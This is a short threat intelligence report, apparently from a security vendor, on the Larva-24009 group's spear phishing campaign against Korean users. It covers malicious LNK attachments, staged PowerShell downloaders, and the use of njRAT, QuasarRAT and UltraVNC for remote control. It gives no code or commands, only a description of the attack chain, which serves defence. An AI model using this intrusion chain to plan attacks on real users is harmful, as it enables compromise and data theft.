Larva-24009 Threat Actor’s Spear Phishing Attack Case Report
AhnLab SEcurity intelligence Center (ASEC) recently confirmed that the Larva-24009 threat actor is carrying out spear phishing attacks targeting Korean users. The threat actor has been active since around 2023 and has been primarily using spear phishing attacks targeting global users. Yet it has been recently confirmed that there are infection cases targeting Korean users as well.
Information about the attacker is not known; based on the known attack cases so far, industries like blockchain, music, and healthcare have been identified, but there are not many details about the specific targets.
The Larva-24009 threat actor starts with spear phishing attacks using LNK malware and ultimately installs malware for exfiltrating information and remote control. To maintain persistence and control infected systems, the threat actor is known to use custom-made PowerShell malware strains.
The attacker appears to use spear phishing attacks in the initial infiltration stage. In the email attachment, there are images or document files along with a malicious LNK file (see Figure 1). The user runs the LNK file upon checking the document, leading to the execution of malicious PowerShell commands.
Figure. Disguised documents, image files, and LNK malware within the compressed file
One characteristic of the Larva-24009 threat actor is that they create and use various PowerShell scripts. The PowerShell scripts are executed sequentially in several stages and mostly function to download additional payloads or execute downloaded commands.
Although remote control is possible through the malware strains mentioned in this report so far, the threat actor controlled the infected systems using commercial tools. They originally used njRAT but are recently employing QuasarRAT.
Figure. UltraVNC server installed on the infected system
